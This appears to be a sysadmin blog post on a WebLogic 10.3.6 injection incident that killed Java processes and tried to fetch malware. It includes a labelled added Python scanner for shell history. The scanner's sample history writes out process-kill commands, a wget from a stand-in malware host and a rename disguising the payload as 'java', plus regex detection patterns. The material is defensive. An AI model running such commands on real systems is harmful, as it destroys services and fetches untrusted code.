WLS 10.3.6 Vulnerability Issue
We recently experienced a security-related issue* with our Test environment WebLogic Server (WLS), the application server running our WebCenter Content (WCC) instance.
In short, code was being injected onto the Linux server running WLS & WCC, either through a SOAP or a WebService call. This showed up as terminal commands that appear to be designed to identify, find, and kill running Java processes (Perl and Python as well). It would then download the malware and rename it to mimic the killed Java processes.
The network firewall prevented downloading of the software. However, we were still facing frequent shutdowns of the Java processes (which is what Oracle WLS, WCC, & Node Manager run as).
I obtained the appropriate patch through Oracle Support, which should prevent the remote sending of the shutdown scripts, and so far it appears to be doing fine.
Below are the terminal commands that were injected and executed on the server. This was found when scrolling through the history of the Linux user which “owns” and executes the Oracle services on the Linux server.
So far, I have seen this in Linux environments; however, we do not know whether Windows is immune or not.
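As an added illustration (not part of the original post, and not the injected commands themselves, which the post does not reproduce), here is a small Python check that scans a user's shell history for the sequence described above: discovery and killing of Java/Perl/Python processes, a download attempt, and a rename to a Java-like name. The history lines are constructed samples, and the patterns are assumptions about what such a script looks like, not signatures from the incident.

```python
import re

# Constructed sample of a shell history file, modelled on the behaviour the
# post describes. The first two and last lines are ordinary admin activity.
SAMPLE_HISTORY = """\
cd /u01/oracle/Middleware
tail -f servers/AdminServer/logs/AdminServer.log
ps -ef | grep java
kill -9 $(pgrep -f java)
pkill -9 perl
wget http://malware.example.invalid/payload -O /tmp/x
mv /tmp/x /tmp/java
ls -la /tmp
"""

# One indicator pattern per stage of the described sequence (assumed patterns).
STAGES = {
    "process_discovery": re.compile(r"\b(ps|pgrep)\b.*\b(java|perl|python)\b"),
    "process_kill": re.compile(r"\b(kill|pkill|killall)\b.*(\bjava\b|\bperl\b|\bpython\b|pgrep)"),
    "download": re.compile(r"\b(wget|curl)\b\s+https?://"),
    "rename_as_java": re.compile(r"\b(mv|cp)\b\s+\S+\s+\S*(java|perl|python)\S*"),
}


def scan_history(text):
    """Return (line_number, command, matched_stages) for every suspicious line."""
    hits = []
    for lineno, cmd in enumerate(text.splitlines(), 1):
        stages = [name for name, rx in STAGES.items() if rx.search(cmd)]
        if stages:
            hits.append((lineno, cmd, stages))
    return hits


def looks_like_kill_and_fetch(hits):
    """True when a process kill is followed later in the history by a download."""
    first_kill = next((n for n, _, s in hits if "process_kill" in s), None)
    first_dl = next((n for n, _, s in hits if "download" in s), None)
    return first_kill is not None and first_dl is not None and first_kill < first_dl


if __name__ == "__main__":
    found = scan_history(SAMPLE_HISTORY)
    for lineno, cmd, stages in found:
        print(f"line {lineno}: {cmd!r} -> {', '.join(stages)}")
    print("kill-then-fetch pattern:", looks_like_kill_and_fetch(found))
```

Point the scanner at the real `~/.bash_history` of the account that runs the Oracle services; a kill of Java processes followed by a download from an untrusted host is the combination worth alerting on.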
A screenshot of the matrix from the Support Document is below.
*Note: This only affects public-facing web servers with no HTTPS!